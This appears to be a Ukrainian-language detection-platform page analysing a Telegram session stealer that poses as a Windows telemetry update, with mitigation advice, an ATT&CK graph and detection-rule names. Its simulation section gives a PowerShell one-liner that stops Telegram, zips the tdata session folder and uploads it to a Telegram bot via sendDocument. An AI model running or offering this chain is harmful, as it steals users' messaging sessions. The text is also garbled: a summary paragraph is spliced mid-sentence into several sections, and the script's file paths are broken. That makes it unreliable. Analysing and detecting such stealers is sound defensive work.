Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисний сценарій PowerShell, розміщений на Pastebin, видає себе за оновлення Windows, одночасно викрадаючи дані сесії Telegram Desktop з інфікованих систем. Сценарій збирає дані хосту, стискає каталог tdata Telegram і ексфільтрує отриманий архів через Telegram Bot API. Дослідники також ідентифікували пов'язаний веб-стікер, призначений для захоплення ключів аутентифікації Telegram Web та пересилання їх на локальний колектор HTTP. Обидва інструменти спираються на один і той самий бот Telegram для сповіщень, хоча наявні докази вказують на те, що вони залишаються на стадії тестування, а не на широкому оперативному використанні. directory, and exfiltrates the resulting archive through the Telegram Bot API. Researchers also identified a related web-based stealer designed to capture Telegram Web authentication keys and forward them to a local HTTP collector. Both tools rely on the same Telegram bot for notifications, though the available evidence suggests they remain in a testing stage rather than broad operational use.
Розслідування
Аналітики відновили два варіанти сценаріїв, розміщених на Pastebin, виявили жорстко закодовані токени ботів і чат ID, та відновили повний процес ексфільтрації. Під час виконання сценарій завершує Telegram.exe, архівує папку і завантажує ZIP-файл через метод API bot’а і ексфільтрує отриманий архів через Telegram Bot API. Дослідники також ідентифікували пов'язаний веб-стікер, призначений для захоплення ключів аутентифікації Telegram Web та пересилання їх на локальний колектор HTTP. Обидва інструменти спираються на один і той самий бот Telegram для сповіщень, хоча наявні докази вказують на те, що вони залишаються на стадії тестування, а не на широкому оперативному використанні. sendDocument sendDocument . Телеметрія бота також виявила окремий веб-стікер, який передавав ключі аутентифікації MTProto до приватного колектора, розміщеного за адресою 192.168.137.131:5000. Загалом, висновки вказують на функціональне тестування та валідацію, а не на зрілу, великомасштабну кампанію.
Мітигація
Організації, які не потребують Telegram, повинні блокувати вихідний трафік до api.telegram.org та пов’язаних з Telegram інфраструктур. Захисники повинні моніторити PowerShell на використання Invoke-RestMethod or WebClient цільових точок API Telegram і виявляти створені в тимчасових каталогах архіви ZIP, що містять і ексфільтрує отриманий архів через Telegram Bot API. Дослідники також ідентифікували пов'язаний веб-стікер, призначений для захоплення ключів аутентифікації Telegram Web та пересилання їх на локальний колектор HTTP. Обидва інструменти спираються на один і той самий бот Telegram для сповіщень, хоча наявні докази вказують на те, що вони залишаються на стадії тестування, а не на широкому оперативному використанні. контент. Будь-які зараз підставлені токени ботів повинні бути негайно скасовані та замінені, щоб запобігти подальшому зловживанню.
Реакція
Якщо виявлено сценарій, припиніть пов’язаний процес PowerShell і видаліть будь-які створені архіви diag.zip . Відкличте всі активні сесії Telegram, пов’язані з ураженим акаунтом, і увімкніть двофакторну аутентифікацію, щоб зменшити ризик продовження доступу. Токен бота повинен бути змінений, а пов’язаний чат бота повинен бути перевірений на наявність ексфільтрованих даних. Більш широкий судовий розслідування також повинно підтвердити, чи були зібрані будь-які додаткові облікові дані або матеріали сесій.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Action nodes action_user_exec["<b>Дія</b> – <b>T1204 Виконання користувачем</b><br/>Жертва запускає сценарій PowerShell під назвою Windows Telemetry Update<br/><b>Техніка</b> T1036 Маскування"] class action_user_exec action action_powershell_interp["<b>Дія</b> – <b>T1059.001 PowerShell</b><br/>Сценарій виконаний через інтерпретатор PowerShell"] class action_powershell_interp action action_sysinfo["<b>Дія</b> – <b>T1082 Виявлення інформації про систему</b><br/>Збір USERNAME, COMPUTERNAME та загальнодоступної IP-адреси"] class action_sysinfo action action_collect_tdata["<b>Дія</b> – <b>T1005 Дані з локальної системи</b><br/>Визначає каталоги tdata Telegram Desktop і завершує процес Telegram.exe"] class action_collect_tdata action action_archive["<b>Дія</b> – <b>T1560.001 Архів через утиліту</b><br/>Compressu2011Archive створює diag.zip із зібраними файлами"] class action_archive action action_delete["<b>Дія</b> – <b>T1070.004 Видалення файлів</b><br/>Видаляє diag.zip після завантаження"] class action_delete action action_exfiltration["<b>Дія</b> – <b>T1020 Автоматизована ексфільтрація</b><br/>Використовує кінцеву точку sendDocument бота Telegram для ексфільтрації ZIP-файлу<br/><b>Підтехніки</b> T1041 Ексфільтрація через канал C2, T1567 Ексфільтрація через веб-сервіс, T1071.001 Веб-протоколи"] class action_exfiltration action action_session_hijack["<b>Дія</b> – <b>T1563 Викрадення сесії віддаленої служби</b><br/>Відтворює ключі авторизації MTProto з отриманих tdata"] class action_session_hijack action action_steal_cookies["<b>Дія</b> – <b>T1550.004 Використання альтернативних матеріалів аутентифікації</b><br/>Краде файли cookie сесії Telegram Web з пам’яті браузера та пересилає колектору"] class action_steal_cookies action %% Tool / Process nodes tool_powershell["<b>Інструмент</b> – <b>Назва</b>: PowerShell<br/><b>Опис</b>: Windows командний інтерпретатор і скриптова мова"] class tool_powershell tool tool_compress["<b>Інструмент</b> – <b>Назва</b>: Compressu2011Archive<br/><b>Опис</b>: cmdlet PowerShell для створення ZIP-архівів"] class tool_compress tool process_telegram["<b>Процес</b> – <b>Назва</b>: Telegram.exe<br/><b>Опис</b>: Десктопна версія клієнта всесвітню телеграфію"] class process_telegram process tool_telegram_bot["<b>Інструмент</b> – <b>Назва</b>: Telegram Bot API<br/><b>Опис</b>: кінцева точка sendDocument, що використовується для ексфільтрації даних"] class tool_telegram_bot tool %% Connections showing flow action_user_exec –>|активує| action_powershell_interp action_powershell_interp –>|використовує| tool_powershell action_powershell_interp –>|виконує| action_sysinfo action_sysinfo –>|збирає| action_collect_tdata action_collect_tdata –>|завершує| process_telegram action_collect_tdata –>|використовує| tool_compress action_collect_tdata –>|створює| action_archive action_archive –>|використовує| tool_compress action_archive –>|продукує| action_exfiltration action_exfiltration –>|використовує| tool_telegram_bot action_exfiltration –>|видаляє| action_delete action_delete –>|очищує| action_exfiltration action_exfiltration –>|дає можливість| action_session_hijack action_session_hijack –>|полегшує| action_steal_cookies "
Потік атаки
Детекція
Виклик підозрілих методів .NET з PowerShell (через powershell)
Переглянути
Можливе злочинне використання Telegram як каналу командування та контролю (через dns_query)
Переглянути
Спроба повідомлення про можливий пошук IP або доменного зв’язку (через dns)
Переглянути
IoC (джерельна IP) для виявлення: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
Переглянути
IoC (цільова IP) для виявлення: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
Переглянути
Виявлення викрадача сесій Telegram через сценарій PowerShell [Мережеве підключення Windows]
Переглянути
Оновлення телеметрії Windows – Викрадач сесій Telegram [PowerShell Windows]
Переглянути
Виконання симуляції
Передумова: перевірка перед польотом телеметрії та базової лінії повинна бути пройдена.
Основні моменти: цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила детекції. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на створення точної телеметрії, очікуваної логікою детекції.
-
Наратив атаки та команди:
- Розвідка: Атакуючий запитує
api.ipify.org, щоб дізнатися загальнодоступну IP-адресу хоста (пізніше використовується для логування). - Розрив обслуговування: Зупиняє законний процес Telegram Desktop, щоб переконатися, що файли не заблоковані.
- Збір даних: Рекурсивно копіює каталог Telegram Desktop (файли сесії) у тимчасове місце.
і ексфільтрує отриманий архів через Telegram Bot API. Дослідники також ідентифікували пов'язаний веб-стікер, призначений для захоплення ключів аутентифікації Telegram Web та пересилання їх на локальний колектор HTTP. Обидва інструменти спираються на один і той самий бот Telegram для сповіщень, хоча наявні докази вказують на те, що вони залишаються на стадії тестування, а не на широкому оперативному використанні.Архівування: - Archiving: Стискає зібрані дані у
diag.zip. - Ексфільтрація: Надсилає архів до зловмисного Telegram Bot через
Invoke‑RestMethod. - Очищення: Видаляє тимчасовий архів і за бажанням перезапускає Telegram.
- Розвідка: Атакуючий запитує
-
Скрипт регресійного тесту: Виконує весь ланцюг атак у одному рядку команд PowerShell (відповідає правилу детекції).
# Оновлення телеметрії Windows – Викрадач сесій Telegram $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Команди очищення: Відновлює середовище до початкового стану.
# Перезапустіть Telegram (за необхідності) та видаліть скопійовані дані Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;